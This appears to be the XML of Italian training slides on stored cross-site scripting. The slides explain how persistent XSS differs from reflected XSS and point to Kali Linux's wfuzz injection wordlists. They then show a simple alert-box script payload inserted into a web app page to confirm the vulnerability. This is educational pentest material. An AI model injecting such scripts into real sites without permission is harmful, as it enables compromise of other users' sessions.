            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="4606481" y="-1935725"/>
            <a:ext cx="9648774" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="9648774">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9648774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9648774"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7350715">
            <a:off x="15189699" y="3713748"/>
            <a:ext cx="7665473" cy="7339690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7339690" w="7665473">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7665473" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665473" y="7339691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7339691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="7350715">
            <a:off x="-1010145" y="9251512"/>
            <a:ext cx="4960930" cy="4750091"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4750091" w="4960930">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4960931" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4960931" y="4750090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4750090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1596600" y="43482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3.2 - STORED XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="969655" y="-188519"/>
            <a:ext cx="7673361" cy="10633204"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 9" id="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0" id="1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1" id="1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12" id="1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3" id="1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4" id="1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5" id="1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6" id="1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7" id="1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8" id="1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21" id="21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11632009" y="1929234"/>
            <a:ext cx="5989243" cy="6397698"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7985658" cy="8530264"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 22" id="22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="7985658" cy="8530264"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="893391" cy="954318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 23" id="23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="false" flipV="false" rot="0">
                <a:off x="0" y="0"/>
                <a:ext cx="893391" cy="954318"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="954318" w="893391">
                    <a:moveTo>
                      <a:pt x="66014" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="827376" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="863835" y="0"/>
                      <a:pt x="893391" y="29556"/>
                      <a:pt x="893391" y="66014"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="893391" y="888304"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="893391" y="905812"/>
                      <a:pt x="886436" y="922603"/>
                      <a:pt x="874056" y="934983"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="861676" y="947363"/>
                      <a:pt x="844884" y="954318"/>
                      <a:pt x="827376" y="954318"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="66014" y="954318"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="29556" y="954318"/>
                      <a:pt x="0" y="924763"/>
                      <a:pt x="0" y="888304"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="66014"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="29556"/>
                      <a:pt x="29556" y="0"/>
                      <a:pt x="66014" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="TextBox 24" id="24"/>
              <p:cNvSpPr txBox="true"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="-47625"/>
                <a:ext cx="893391" cy="1001943"/>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1008389" y="1803654"/>
              <a:ext cx="5968880" cy="5349577"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2456"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1637">
                  <a:solidFill>
                    <a:srgbClr val="555555"/>
                  </a:solidFill>
                  <a:latin typeface="Open Sauce Bold"/>
                </a:rPr>
                <a:t>In termini di sfruttabilità, la differenza fondamentale tra XSS riflesso e memorizzato è che una vulnerabilità XSS memorizzata consente attacchi autonomi all'interno dell'applicazione stessa. L'aggressore non ha bisogno di trovare un modo esterno per indurre altri utenti a fare una richiesta particolare contenente il proprio exploit. Piuttosto, l’aggressore inserisce il proprio exploit nell’applicazione stessa e aspetta semplicemente che gli utenti lo trovino.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="2456"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8039590" y="6415263"/>
            <a:ext cx="4397163" cy="2226064"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2226064" w="4397163">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4397162" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4397162" y="2226063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2226063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 27" id="27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="3718240" y="1919709"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573839" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573839" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>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9" id="29"/>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30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="382925" y="5751650"/>
            <a:ext cx="8846821" cy="2202140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2522"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1801">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GLI ATTACCHI ARCHIVIATI SONO QUELLI IN CUI LO SCRIPT INIETTATO VIENE ARCHIVIATO IN MODO PERMANENTE SUI SERVER DI DESTINAZIONE, AD ESEMPIO IN UN DATABASE, IN UN FORUM DI MESSAGGI, NEL REGISTRO DEI VISITATORI, NEL CAMPO DEI COMMENTI, ECC. LA VITTIMA RECUPERA QUINDI LO SCRIPT DANNOSO DAL SERVER QUANDO RICHIEDE LO SCRIPT MEMORIZZATO. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="366759" y="2729093"/>
            <a:ext cx="8862987" cy="2398991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3222"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2301">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>LO SCRIPTING CROSS-SITE ARCHIVIATO (NOTO ANCHE COME XSS DI SECONDO ORDINE O PERSISTENTE) SI VERIFICA QUANDO UN'APPLICAZIONE RICEVE DATI DA UNA FONTE NON ATTENDIBILE E LI INCLUDE NELLE SUE RISPOSTE HTTP SUCCESSIVE IN MODO NON SICURO.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 32" id="32"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="180766" y="1978042"/>
            <a:ext cx="3318570" cy="44831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Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Cos’è lo XSS Stored ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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418641" y="4994425"/>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400000">
            <a:off x="-2519171" y="6021991"/>
            <a:ext cx="7472928" cy="6931140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6931140" w="7472928">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7472928" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7472928" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-1125664" y="-2004034"/>
            <a:ext cx="5414402" cy="5184290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5184290" w="5414402">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5414401" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5414401" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="2943662" y="-27432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5400000">
            <a:off x="13928287" y="2849604"/>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10800000">
            <a:off x="14134873" y="-1563445"/>
            <a:ext cx="5414402" cy="5184290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5184290" w="5414402">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5414401" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5414401" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1772259" y="845286"/>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3.3 - VERIFICA DELLE VULNERABILITÀ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="952201" y="68983"/>
            <a:ext cx="7423037" cy="10286322"/>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2" id="1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0710770" y="1808492"/>
            <a:ext cx="7389813" cy="1438940"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1438940" w="7389813">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7389813" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7389813" y="1438940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1438940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10504216" y="3518573"/>
            <a:ext cx="6294183" cy="3249854"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3249854" w="6294183">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6294183" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6294183" y="3249854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3249854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10951800" y="7263033"/>
            <a:ext cx="7148783" cy="2224528"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2224528" w="7148783">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7148783" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7148783" y="2224528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2224528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="-30013" t="-46814" r="-6193" b="-215596"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="-676050">
            <a:off x="8465595" y="1158960"/>
            <a:ext cx="2534758" cy="1299063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1299063" w="2534758">
                <a:moveTo>
                  <a:pt x="0" y="1299063"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2534758" y="1299063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2534758" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1299063"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>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8" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="148012" y="2489862"/>
            <a:ext cx="9031414" cy="6080740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Prima di testare con mano la vulnerabilità riscontrata nella pagina Stored XSS, vediamo cosa ci offre Kali Linux. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nella cartella</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> /usr/share/wordlists/wfuzz/Injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> sono presenti vari file di testo contenenti script per attacchi di tipo injections. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Come si vede dall’immagine a destra, vi è una lista di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>script XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> visualizziamo il contenuto del file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Prendiamo in prestito lo script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“WXSS”)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e lo modifichiamo in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“XSS Stored funziona qui”)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3081"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Questo script modificato lo andremo ad inserire nella pagina apposita per verificare la vulnerabilità della Web App.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2801"/>
